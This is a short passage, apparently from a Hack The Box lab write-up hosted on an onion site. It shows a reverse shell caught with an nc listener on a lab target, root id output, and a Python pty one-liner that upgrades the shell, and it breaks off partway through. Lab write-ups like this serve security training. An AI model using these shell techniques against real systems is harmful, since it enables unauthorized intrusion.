http://binternet.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/HTB/Medium/44.html
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.110] 34287
/bin/sh: can't access tty; job control turned off
/opt/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) Before we do anything, let's upgrade our shell to a full tty shell: /opt/app # python -c 'import pty; pty.spawn("/bin/sh")'
/opt/app # ^Z
[1]+ Stopped nc -lvnp 9001
[...